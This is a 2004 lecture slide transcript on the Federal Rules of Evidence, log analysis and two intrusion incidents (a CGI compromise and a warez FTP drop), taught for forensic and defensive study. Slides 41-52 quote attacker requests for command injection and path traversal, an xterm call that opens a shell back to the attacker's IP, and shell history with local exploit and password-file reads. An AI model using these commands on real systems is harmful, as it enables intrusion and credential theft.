CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management - PowerPoint PPT Presentation

About This Presentation
Title:

CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management

Description:

Quiz #2: You will be given 4 papers and expected to write a page on ... 200 5469 '-' 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)' '/htdocs/biz/captiva' ... – PowerPoint PPT presentation

Number of Views:132
Avg rating:3.0/5.0
Slides: 73
Provided by: simsonlg
Category:

less

Transcript and Presenter's Notes

Title: CSCI E-170: November 30, 2004 Administrivia Federal Rules of Evidence Logging Integrity Management


1
CSCI E-170 November 30, 2004AdministriviaFeder
al Rules of EvidenceLoggingIntegrity Management
2
Administrivia
  • Project Proposals are due today
  • Who is in your group?
  • What are you doing?
  • Not graded
  • Quiz 2 You will be given 4 papers and expected
    to write a page on each.

3
Administrivia 2
  • Some students have not turned in any work to
    date.
  • Think about dropping the course.
  • Students who do not turn in a final project will
    fail.

4
Federal Rules of Evidence
  • 9 Articles
  • Many states follow FRE
  • Codifies common law
  • Why study them?

5
Article I Ground Rules
  • Rule 101 - Scope
  • Rule 1101 - Does not apply to preliminary
    questions of fact, grand jury, miscellaneous
    proceedings
  • Rule 102 - Purpose
  • Fairness
  • Eliminate unjustifiable expense and delay
  • Rule 103 - Rulings on Evidence
  • What to do when opposing parties disagree.

6
Article II JUDICIAL NOTICE
  • Every case involves the use of hundres or
    thousands of non-evidence facts
  • When a witness says car, eveyone assumes that
    the car is an automobile, not a railroad car,
    that it is self-propelled, and so on.

7
ARTICLE III PRESUMPTIONS IN CIVIL ACTIONS AND
PROCEEDINGS
  • Determines who has the burden of rebutting the
    evidence.
  • Presumption imposes on the party against whom it
    is directed the burden of going forward with
    evidence to rebut or meet the presumption

8
ARTICLE IV RELEVANCY AND ITS LIMITS
  • Relevant evidence is admissible
  • Irrelevant Evidence is inadmissible
  • Evidence that wastes time can be excluded
  • Character evidence of defendant not admissible to
    prove conduct (unless introduced by defendant)
  • Character evidence of victim introduced only in
    homicide case to rebut evidence that alleged
    victim was first aggressor
  • Rule 412 - rape shield law

9
ARTICLE V PRIVILEGES
  • may be interpreted by the courts of the United
    States in light of reason and experience

10
ARTICLE VI WITNESSES
  • Rule 601 Every person is competent to be a
    witness (except as otherwise provided)
  • Rule 602 Witness must have personal knowledge
  • Rule 605 Judge cannot testify as witness
  • Rule 606 Juror may not testify as witness
  • Rule 612 Adverse party is entitled access to
    writing used to refresh memory

11
ARTICLE VII OPINIONS AND EXPERT TESTIMONY
  • Rule 701 Law Witness may not testify based on
    scientific, technical, or other specialized
    knowledge
  • Rule 702 Experts must be qualified use reliable
    principles and methods witness must apply
    standards to this case.
  • Rule 704 Experts may state an opinion of the
    ultimate issue, except for matters of mental
    state.

12
ARTICLE VIII HEARSAY
  • Rule 801 Hearsay is a statement, other than
    one made by the declarant while testifying at the
    trial or hearing, offered in evidence to prove
    the truth of the matter asserted.
  • Many, many exceptions to hearsay
  • 803(5) - Recorded Recollection
  • 803(6) - Records of regularly conducted activity
  • 803(7) Absence of entry in records kept in
    accordance with 803(6) to prove nonoccurance or
    nonexistence

13
ARTICLE IX AUTHENTICATION AND IDENTIFICATION
  • Rule 901 Documents must be authenticated many
    examples given
  • Rule 902 Some documents are self-authenticating
    (computer records arent)

14
ARTICLE X CONTENTS OF WRITINGS, RECORDINGS, AND
PHOTOGRAPHS
  • Rule 1002 Originals are required, except where
    duplicates may be admitted.
  • Rule 1003 Duplicates may be admitted unless
    genuine questions are raised about the
    authenticity or in unfair circumstances.
  • What is an original computer record?

15
ARTICLE XI MISCELLANEOUS RULES
  • Rule 1101 Applicability
  • Rule 1102 Amendments
  • Rule 1103 Title

16
Orin S. Kerr article
  • Whats the point?
  • What are Records of regularly conducted
    activity?
  • Are computer records monolithic?
  • How do you Authenticate computer records? How are
    they challenged?
  • When do the Hearsay rules apply?
  • Whats the deal with postings from websites of
    white supremacist groups?
  • What about email in a harassment case?

17
What is a log?
  • Definition?
  • Unix vs. Windows?
  • Palm?

18
What gets logged?
19
What gets logged?
  • Logins / logouts
  • Privilege escalation
  • Security relevant events

20
What goes in a log?
21
Why keep logs?
22
Why look at logs? (Marcus)
  • Policy
  • Legality
  • Cost saving

23
Common mistakes (Marcus)
  • 1 collecting it and not looking at it (might
    as well log to /dev/null)
  • 2 watching logs from perimeter systems while
    ignoring internal systems
  • 3 Designing your log architecture before you
    decide what youre going to collect
  • 4 Only looking for what you know you want to
    find instead of just looking to see what you find.

24
Common Mistakes 2
  • 5 Proceeding without doing envelope estimates
    with of load.
  • 6 thinking your logs are evidence if you dont
    collect them right
  • 7 forgetting that this is just a data
    management problem
  • 8 Drinking the XML Kool-ade

25
How are things logged?
  • f fopen(logfile,w)
  • syslog()
  • Logger

26
Web Logs
  • access_log vs. error_log
  • 65.54.188.137 - - 30/Nov/2004001654 -0500
    "GET /photos/security/printTifs/medRes/onGray/plat
    ePlusStickerGreyMR.tif HTTP/1.0" 200 6017064 "-"
    "msnbot/0.3 (http//search.msn.com/msnbot.htm)"
  • 66.35.208.62 - - 30/Nov/2004001738 -0500
    "GET /blog/index.rdf HTTP/1.1" 200 8882 "-"
    "Jakarta Commons-HttpClient/2.0.1"

27
Web logsgrep 'q' www/simson.net/logs/access_lo
g sed 's/.q//' awk 'print 1' head
  • smartidentitycardclientdisney-gostart10"
  • simsonhldelrieUTF-8oeUTF-8start20saN"
  • backingupraiddriveshlenlrieUTF-8oeUTF-8
    start10saN"
  • lzhufhlenlrieUTF-8start40saN"
  • brownsimsonFORMSMCRT"
  • 22homewiring22_sb_langen"
  • 22wirelessphotoalbum22lr"
  • lzhufpublicdomainhlenlrieUTF-8start10sa
    N"
  • simsonieISO-8859-1hlenbtnGGoogleSearchmeta
    "
  • simsonieISO-8859-1hlenbtnGGoogleSearchmeta
    "

28
Mail Logs
  • 2004-11-13 235135 Hns.simson.net (64.7.15.234)
    64.7.15.234 Fltruxnezze_at_swissonline.chgt
    rejected RCPT ltdomideltana_at_ex.comgt Unknown user
  • 2004-11-13 235136 Hns.simson.net (64.7.15.234)
    64.7.15.234 Fltruxnezze_at_swissonline.chgt
    rejected RCPT ltdomidrumsaloe_at_ex.comgt Unknown
    user
  • 2004-11-13 235136 Hns.simson.net (64.7.15.234)
    64.7.15.234 Fltruxnezze_at_swissonline.chgt
    rejected RCPT ltdomie.douglass_at_ex.comgt Unknown
    user
  • 2004-11-13 235137 Hns.simson.net (64.7.15.234)
    64.7.15.234 Fltruxnezze_at_swissonline.chgt
    rejected RCPT ltdomielihli_at_ex.comgt Unknown user
  • 2004-11-13 235137 Hns.simson.net (64.7.15.234)
    64.7.15.234 Fltruxnezze_at_swissonline.chgt
    rejected RCPT ltdomierdoc14_at_ex.comgt Unknown user
  • 2004-11-13 235138 Hns.simson.net (64.7.15.234)
    64.7.15.234 Fltruxnezze_at_swissonline.chgt
    rejected RCPT ltdomifdwyer_at_ex.comgt Unknown user
  • 2004-11-13 235138 Hns.simson.net (64.7.15.234)
    64.7.15.234 Fltruxnezze_at_swissonline.chgt
    rejected RCPT ltdomil.cpwhiz40_at_ex.comgt Unknown
    user
  • 2004-11-13 235201 Hns.simson.net
    (cable-67-97-53-251.dct.al.charter.com)
    64.7.15.234 Fltmvceubrfvsrm_at_charter.comgt
    rejected RCPT ltgayda_at_ex.comgt Unknow
  • n user
  • 2004-11-13 235201 Hns.simson.net
    (cable-67-97-53-251.dct.al.charter.com)
    64.7.15.234 Fltmvceubrfvsrm_at_charter.comgt
    rejected RCPT ltjensen_at_ex.comgt Unkno
  • wn user

29
Radius Logs
  • Sun Mar 18 043524 2001 Acct-Session-Id
    "00000000 NAS-IP-Address 192.168.1.5
    Acct-Status-Type Stop Acct-Session-Time 0
    Acct-Delay-Time 0 Timestamp 984918924
    Request-Authenticator VerifiedSun Mar 18
    043524 2001 Acct-Session-Id "06000004
    User-Name "admin NAS-IP-Address
    192.168.1.5 Acct-Status-Type Start
    Acct-Authentic Local Service-Type
    Administrative-User Login-Service Telnet
    Login-IP-Host 192.168.1.1 Acct-Delay-Time
    75 Timestamp 984918924 Request-Authenticat
    or Verified

30
Security Incidents Strange Authentication
Attempts
  • I woke up to find these entries in my RADIUS log
    file Tue Mar 30 102600 2004 Auth Login
    incorrect config/system (from nas xxxx/S99)
    Tue Mar 30 102600 2004 Auth Login incorrect
    config/password admin (from nas xxxx/S99) Tue
    Mar 30 102600 2004 Auth Login incorrect
    config/13370n3z (from nas xxxx/S99) Tue Mar
    30 102601 2004 Auth Login incorrect
    password/fawkoffsz (from nas xxxx/S99) Tue
    Mar 30 102601 2004 Auth Login incorrect
    password/save (from nas xxxx/S99)

http//seclists.org/lists/incidents/2004/Mar/0116.
html
31
Log architectures
  • UDP log issues
  • Windows

32
Logging on Unix
  • /etc/syslog.conf
  • /etc/newsyslog.conf
  • Grep
  • swatch

33
Logging on Windows
  • Event Viewer
  • Local security settings

34
Log hosts Aggregation
35
Can you trust these logs?
36
October 7th, 1997
  • 600pm
  • Arrive hotel in New York City.
  • Phone system does not support my modem.
  • Cell phone reception is terrible.
  • 845pm
  • Phone call from Eric Bates.
  • I think that we have a visitor.

37
Wed October 7th, 1997
  • User http is logged in on ttyp0 and idle for one
    day
  • bash-2.02 w
  • 857PM up 27 days, 1419, 5 users, load
    averages 0.28, 0.33, 0.35
  • USER TTY FROM LOGIN_at_ IDLE WHAT
  • http p0 KRLDB110-06.spli Tue02AM 1days
    /bin/sh
  • simsong p1 asy12.vineyard.n 842PM 15 -tcsh
    (tcsh)
  • ericx p2 mac-ewb.vineyard 846PM 0
    script
  • ericx p3 mac-ewb.vineyard 846PM 11 top
  • ericx p4 mac-ewb.vineyard 853PM 1 sleep
    5
  • bash-2.02
  • (Other employees had seen this and ignored it!)

38
First step Document the machine
  • script(1) to create a transcript
  • ps process list
  • netstat -a open network connections
  • (lsof) open files
  • grep krldb access_log likely avenue of attack
  • Goals
  • Dont alarm intruder.
  • Find mechanism of access
  • Find out what he/she did.
  • Plug the holes.

39
ps - processes
  • Attacker only had two processes
  • /bin/sh on /dev/ttyp0 (2 copies)
  • PID 18671 and 26225
  • Idle since 2AM the previous day.
  • walden 336 grep p0 plist
  • http 18671 0.0 0.1 244 276 p0 Is
    Tue02AM 002.23 /bin/sh
  • http 26225 0.0 0.1 236 276 p0 I
    Tue04AM 000.07 /bin/sh
  • walden 337

40
netstat - network connections
  • w gave incomplete hostname
  • KRLDB110-06.spli
  • netstat revealed one connection -- x11!
  • bash-2.02 netstat -a
  • Active Internet connections (including servers)
  • Proto Recv-Q Send-Q Local Address
    Foreign Address (state)
  • . . .
  • tcp 0 0 APACHE.VINEYARD..3098
    KRLDB110-06.spli.X11 ESTABLISHED
  • Use netstat n to get IP address, from which you
    can get the full DNS name.

41
access_log - showed attack
  • Grep krldb /usr/local/apache/logs/access_log
  • krldb110-06.splitrock.net - - 06/Oct/199802534
    8 -0400 "GET /cgi-bin/phf?Qnameme0als20-lFa
    HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible
    MSIE 4.01 Windows 98)" "/htdocs/biz/captiva
  • krldb110-06.splitrock.net - - 06/Oct/199802535
    0 -0400 "GET /cgi-bin/faxsurvey?ls20-lFa
    HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible
    MSIE 4.01 Windows 98)" "/htdocs/biz/captiva
  • krldb110-06.splitrock.net - - 06/Oct/199802535
    2 -0400 "GET /cgi-bin/view-source?../../../../../
    ../../../etc/passwd HTTP/1.0" 404 - "-"
    "Mozilla/4.0 (compatible MSIE 4.01 Windows 98)"
    "/htdocs/biz/captiva"

42
Attacker GETs
  • GET /cgi-bin/phf?Qnameme0als20-lFa
  • GET /cgi-bin/faxsurvey?ls20-lFa
  • GET /cgi-bin/view-source?../../../../../../../../e
    tc/passwd
  • GET /cgi-bin/htmlscript?../../../../../../../../et
    c/passwd
  • GET /cgi-bin/campas?0als20-lFa
  • GET /cgi-bin/handler/useless_shitls20-lFa?data
    Download
  • GET /cgi-bin/php.cgi?/etc/passwd
  • GET /cgi-bin/faxsurvey?ls20-lFa
  • GET /cgi-bin/faxsurvey?uname20-a
  • GET /cgi-bin/faxsurvey?id
  • GET /cgi-bin/faxsurvey?cat20/etc/passwd
  • GET /cgi-bin/faxsurvey?ls20-lFa20/usr/
  • GET /cgi-bin/faxsurvey?id
  • GET /cgi-bin/faxsurvey?pwd
  • GET /cgi-bin/faxsurvey?/bin/pwd
  • GET /cgi-bin/faxsurvey?ls20-lFa
  • GET /cgi-bin/faxsurvey?ls20-lFa20../conf/

43
Facts so far
  • It looks like the faxsurvey program allowed
    attacker to run arbitrary programs.
  • No evidence that he ran xterm --- except for the
    X11 connection back to his machine.
  • We dont know what he did or what else he knows.

44
Action plan
  • Add filter to router to block all access from
    splitrock (his ISP).
  • STOP his processes and gcore them to get command
    history.
  • kill -STOP PIDs
  • gcore -c file pid
  • strings file
  • Rename/remove the faxsurvey program (part of
    hylafax system).

45
Selected Environment variablesfrom /bin/sh 1
  • GATEWAY_INTERFACECGI/1.1
  • REMOTE_HOSTkrldb110-06.splitrock.net
  • REMOTE_ADDR209.156.113.121
  • DOCUMENT_ROOT/htdocs/biz/captiva
  • REMOTE_PORT4801
  • SCRIPT_FILENAME/vni/cgi-bin/faxsurvey
  • LOGNAMEhttp
  • REQUEST_URI/cgi-bin/faxsurvey?/usr/X11R6/bin/xter
    m20-display20209.156.113.1210.020-rv20-e20/b
    in/sh
  • DISPLAY209.156.113.1210.0
  • SERVER_PORT80
  • SCRIPT_NAME/cgi-bin/faxsurvey

46
History from /bin/sh 1
  • st2.c
  • cron.c
  • cxterm.c
  • x2.c
  • qpush.c
  • cat t.c
  • cat .c
  • cat s.c
  • gc c
  • ls -lFa
  • ./s -v c2
  • ./s p0
  • ls -lFa /
  • cat .s
  • ls -lFa
  • cat /w
  • ls -lFa /
  • cat .s

_.s not found gcc -o s steal.c ls -lFa
.c gcc -o s s.c ftp 209.156.113.121 gcc -o s
st2.c ./s console t .s .121 qpush.c ppp.c t2.c cro
n.c cxterm.c tcsh x2.c README README.debian
qpush qpush.c qpush.c.old gf not
found /tmp mfs28 /bin/sh Looks like the
attacker was trying to get some sort of
root-stealing exploit for Linux (or Debian Linux)
to work on the machine.
47
Selected history from /bin/sh 2
  • /bin/sh
  • /bin/sh
  • /etc/inetd.conf
  • qpush.c
  • /usr/bin/gcc
  • n/gcc
  • ./cc
  • expr
  • done
  • /bin/sh
  • inetd.conf
  • t) telnet 127.1 143
  • cd /etc
  • cat .s
  • which pwd
  • ls -lFa
  • expr L 1
  • ls -lFa
  • ./cc -10

Attacker sees that we are running imap
48
Selected history from /bin/sh 2
  • ./cc
  • /tmp/.s
  • /tmp
  • cd /tmp
  • cd .s
  • L100
  • cd .s
  • L-100
  • ls -lFa
  • cd /tmp
  • /bin/sh
  • ./q 127.1
  • load
  • /bins
  • _127.1
  • _/bins
  • ./cc
  • ./cc -92
  • ./cc -100

Attempts to exploit imap vulnerability
49
Selected history from /bin/sh 2
  • cat .s
  • export L
  • _.s
  • cat /etc/passwd grep "root"
  • DISPLAY209.156.113.1210.0 -rvgdsg
  • DISPLAY209.156.113.1210.0
  • cat /etc/passwd Grep "http"
  • cat /etc/passwd grep "http"
  • cat /etc/passwd grep "www"
  • while
  • done
  • 2 L
  • echo L
  • (./i 403 0xefbfd5e8 100 cat) nc 127.1 143
  • cx L
  • L 1
  • (./i 403 0xefbfd5e8 100 cat) telnet 127.1 143
  • echo
  • ./cc L

Searching for accounts and passwords
Tries again for imap
50
Selected history from /bin/sh 2
  • uname
  • ftp 209.156.113.121
  • mv pp.c p.c
  • ls -lFa mas
  • ls -lFa /etc grep "mas"
  • cat master.passwd
  • telnet 127.1 25
  • locate modstat
  • which modstat
  • ls -lFa /usr/bin/mo
  • locate modstate
  • locate
  • ico s.c
  • locate modload
  • grep
  • ftp wildsau.idv.uni-lki
  • i-lki
  • cat /etc/inetd.conf
  • ./q -0 127.1

Tries for shadow passwordfile
Tries again for sendmail
Tries for linux kernel module loader
And so on
51
Epilogue
  • We spoke with Splitrock
  • They didnt seem to care (Splitrock is a prodigy
    dialup port in Texas.)
  • Eventually we were forced to lower the block.
  • FBI didnt care
  • This guy is clearly good
  • But we didnt have more than 8,000 in damages.
  • Vulnerability in faxsurvey had been reported
    July 29, 1998
  • nearly three months before incident!

52
BUGTRAQ Report
  • Date Tue, 4 Aug 1998 074124 -0700
  • Reply-To dod_at_muenster.net
  • From Tom ltdod_at_MUENSTER.NETgt
  • Subject remote exploit in faxsurvey
    cgi-script
  • Hi!
  • There exist a bug in the 'faxsurvey' CGI-Script,
    which allows an attacker to
  • execute any command s/he wants with the
    permissions of the HTTP-Server.
  • All the attacker has to do is type
  • "http//joepc.linux.elsewhere.org/cgi-bin/faxsurve
    y?/bin/cat20/etc/passwd"
  • in his favorite Web-Browser to get a copy of your
    Password-File.
  • All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think
    also older ones) with the
  • HylaFAX package installed are vulnerable to this
    attack.
  • AFAIK the problem exists in the call of 'eval'.

53
Epilogue 2
  • Follow security advisories.
  • Hard to do.
  • Dont let http
  • run gcc
  • read /usr/include

54
Detecting attacks with MRTG
  • Developed by
  • Tobias Oetiker ltoetiker_at_ee.ethz.chgt
  • Dave Rand ltdlr_at_bungi.comgt
  • Designed to graph bandwidth of connections
  • Useful for graphing any value that changes over
    time.

55
Typical MRTG uses
  • T1 utilization
  • Dialup utilization



56
More MRTG uses
  • CPU utilization
  • GIF response time



57
MRTG shows changes over time
  • Hourly
  • Daily
  • Weekly
  • Monthly

58
May 19, 1998
  • 1000 am
  • Meeting in Washington DC at the FBI.
  • 330pm
  • Get on train from Washington -gt Boston(8 hour
    train ride - good chance to relax.)
  • 430pm
  • Call on cell phone from Aaron

59
Things are acting strange
  • Single server
  • WWW, POP, IMAP, etc.
  • CGI scripts terminating abnormally.
  • POP server sometimes disconnecting before e-mail
    is downloaded.
  • Finger doesnt work quite right.
  • Rest of Internet seems normal.

60
Whats wrong?
  • No clue
  • Reboot the computer!
  • Problem goes away for 30 minutes, then comes back

61
Process list looks normal
  • USER PID CPU MEM VSZ RSS TT STAT
    STARTED TIME COMMAND
  • simsong 1770 86.4 2.0 5184 5212 p3 R
    534PM 447.73 /usr/local/bin/perl
    /usr/local/bin/report.www -v (report.www)
  • root 24659 31.4 0.0 0 0 ?? Z
    419PM 000.00 (admin_server)
  • root 2345 2.0 0.1 220 284 ?? S
    31Dec69 000.02 (ping)
  • root 1406 0.0 0.0 0 0 ?? Z
    532PM 000.00 (junkbuster)
  • root 0 0.0 0.0 0 0 ?? DLs
    Mon01PM 000.30 (swapper)
  • root 1 0.0 0.1 148 288 ?? Ss
    Mon01PM 001.63 /sbin/init
  • root 2 0.0 0.0 0 12 ?? DL
    Mon01PM 000.01 (pagedaemon)
  • root 15 0.0 0.0 68 64 ?? Is
    Mon01PM 000.00 asyncd 2
  • root 17 0.0 0.0 68 64 ?? Is
    Mon01PM 000.02 asyncd 2
  • root 26 0.0 0.8 748 2008 ?? Ss
    Mon01PM 000.67 mfs -o rw -s 40960 /dev/sd0b
    /tmp (mount_mfs)
  • root 51 0.0 0.1 268 296 ?? Ss
    Mon01PM 002.92 gettyd -s
  • root 62 0.0 0.1 160 340 ?? Ss
    Mon01PM 119.11 syslogd
  • daemon 65 0.0 0.1 112 184 ?? Ss
    Mon01PM 001.36 portmap
  • root 72 0.0 0.1 216 300 ?? Ss
    Mon01PM 001.34 mountd
  • root 74 0.0 0.1 144 288 ?? Is
    Mon01PM 000.01 nfsd-master (nfsd)
  • root 76 0.0 0.0 76 100 ?? I
    Mon01PM 000.00 nfsd-server (nfsd)
  • root 77 0.0 0.0 76 100 ?? I
    Mon01PM 000.04 nfsd-server (nfsd)
  • root 78 0.0 0.0 76 100 ?? I
    Mon01PM 000.00 nfsd-server (nfsd)

62
MRTG reveals a problem
  • Something is eating a lot of outgoing bandwidth
  • BLUE is transmitted data
  • GREEN is received data

63
Process list shows a problem far down from the
top
  • ftp 1471 0.0 0.2 740 496 ?? I
    1228PM 013.88 ds9.kulnet.kuleuven.ac.be
    anonymous/mailtothedude_at_iname.com RETR
    pwa98cbl.zip\r\n (ftpd)
  • ftp 1750 0.0 0.2 752 504 ?? S
    1232PM 012.79 ds9.kulnet.kuleuven.ac.be
    anonymous/guest_at_ RETR pwa98cbj.zip\r\n (ftpd)
  • ftp 6982 0.0 0.2 288 480 ?? S
    120PM 017.21 142.194.48.68
    anonymous/getright_at_ RETR /simson/open/nothing_her
    e/this_site_sucks/pwa98cbg.zip\r\n (ftpd)
  • ftp 10062 0.0 0.2 288 480 ?? S
    153PM 000.27 cmodem85.lancite.net
    anonymous/getright_at_ RETR /simson/open/
    /calibreX/Win98.Final-PWA/pwa98cbf.zip\r\n (ftpd)
  • ftp 10088 0.0 0.2 288 480 ?? S
    154PM 000.27 cmodem85.lancite.net
    anonymous/getright_at_ RETR /simson/open/
    /calibreX/Win98.Final-PWA/pwa98cbe.zip\r\n (ftpd)
  • ftp 10125 0.0 0.2 288 480 ?? S
    154PM 000.28 cmodem85.lancite.net
    anonymous/getright_at_ RETR /simson/open/
    /calibreX/Win98.Final-PWA/pwa98cbd.zip\r\n (ftpd)
  • ftp 10251 0.0 0.2 288 480 ?? S
    155PM 000.28 cmodem85.lancite.net
    anonymous/getright_at_ RETR /simson/open/
    /calibreX/Win98.Final-PWA/pwa98cbc.zip\r\n (ftpd)
  • Total simultaneous FTP transfers 106

64
Netstat reveals further information
  • walden 424 more netstat-list
  • Active Internet connections (including servers)
  • Proto Recv-Q Send-Q Local Address
    Foreign Address (state)
  • tcp 0 0 VINEYARD.NET.http
    a2p09.capcon.net.1203 SYN_RCVD
  • tcp 0 0 VINEYARD.NET.http
    DSY4.VINEYARD.NE.1406 SYN_RCVD
  • tcp 0 0 VINEYARD.NET.pop
    ASY5.VINEYARD.NE.2117 ESTABLISHED
  • tcp 0 1513 VINEYARD.NET.http
    207.112.204.161.1570 FIN_WAIT_1
  • tcp 0 8500 VINEYARD.NET.http
    srry01m05-128.bc.1505 ESTABLISHED
  • tcp 0 7168 VINEYARD.NET.http
    hd62-160.hil.com.2033 ESTABLISHED
  • tcp 0 8192 VINEYARD.NET.http
    208.232.119.2.4125 ESTABLISHED
  • tcp 0 7552 VINEYARD.NET.20
    hades.osc.epsilo.2943 ESTABLISHED
  • tcp 0 6952 VINEYARD.NET.http
    ww-tl01.proxy.ao.37672 ESTABLISHED
  • tcp 0 0 VINEYARD.NET.ftp
    dns1.bit-net.com.2268 ESTABLISHED
  • tcp 0 0 VINEYARD.NET.http
    cs206-32.student.1068 FIN_WAIT_2
  • tcp 0 0 VINEYARD.NET.ftp
    spc-isp-mon-uas-.1037 ESTABLISHED
  • tcp 0 0 VINEYARD.NET.ftp
    kenny26.zip.com..1033 ESTABLISHED
  • tcp 0 0 VINEYARD.NET.http
    cs206-32.student.1067 FIN_WAIT_2
  • tcp 0 0 VINEYARD.NET.ftp
    sladl3p24.ozemai.1676 ESTABLISHED
  • tcp 0 8760 VINEYARD.NET.pop
    ASY10.VINEYARD.N.1043 ESTABLISHED

65
Weve been warezed!
  • ftp//vineyard.net/simson/open
  • World-writable FTP directory.
  • Two directories were created in open
  • Three spaces
  • nothing_here

66
File list
  • ./open/ /
  • ./open/ /calibreX/
  • ./open/ /calibreX/Win98.Final-PWA/
  • ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
    ws98_FINAL_Retail_Full_Setup-PWA/
  • ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
    ws98_FINAL_Retail_Full_Setup-PWA/PWA.NFO
  • ./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndo
    ws98_FINAL_Retail_Full_Setup-PWA/pwa98rfl1.zip
  • ./open/ /calibreX/Win98.Final-PWA/file_id.diz
  • ./open/ /calibreX/Win98.Final-PWA/PWA.NFO
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cba.zip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbd.good.z
    ip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbb.zip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbc.zip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbd.zip
  • ./open/ /calibreX/Win98.Final-PWA/pwa98cbe.zip
  • . . .
  • ./open/nothing_here/
  • ./open/nothing_here/ /
  • ./open/nothing_here/ /pwa98cba.zip

67
/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/
  • Pirates With Attitudes
  • Supplier PWA Gods
  • Cracker N/A
  • Packager Murmillius
  • Protection Serial Number
  • Type Operating System
  • Disks 21 x 5meg

68
PWA.NFO
  • Here it is Windows '98 Final release - Retail
    Full Install!
  • While every other group will be bringing you so
    many good programs for this operating system,
    it's PWA that brings you the OS itself. It is
    fortunately for the user community that this is
    the case or you would probably have ended up with
    a ripped down release from some other lame group
    missing important system files like KRNL386.exe,
    because disklimits are more important nowadays to
    these people than a working release.

69
PWA.NFO cont
  • You need to download the CABS and the RETAIL
    SETUP and unzip/unrar everything into one
    directory. The reason for this is that as soon
    as I get install keys, I can release RETAIL
    UPGRADE, OEM FULL and OEM UPGRADE versions and
    they will only take 4 meg each (the CAB zips are
    generic thruout all these versions, I can just
    package up the differences in seperate zips to
    save everyone space and time). You just
    unzip whichever one you want into the same
    directory as the generic CAB zips.

70
Question Is PWA.NFO Hearsay?
71
What we did
  • Called Microsofts anti-piracy line.
  • Useless
  • Called FBI
  • Pretty useless as well.
  • Called Pace University
  • This got results
  • not necessarily the right results.

72
Integrity Management
  • What is it?
  • How do you do it?
  • Tripwire
  • Comparison Copies
Write a Comment
User Comments (0)
About PowerShow.com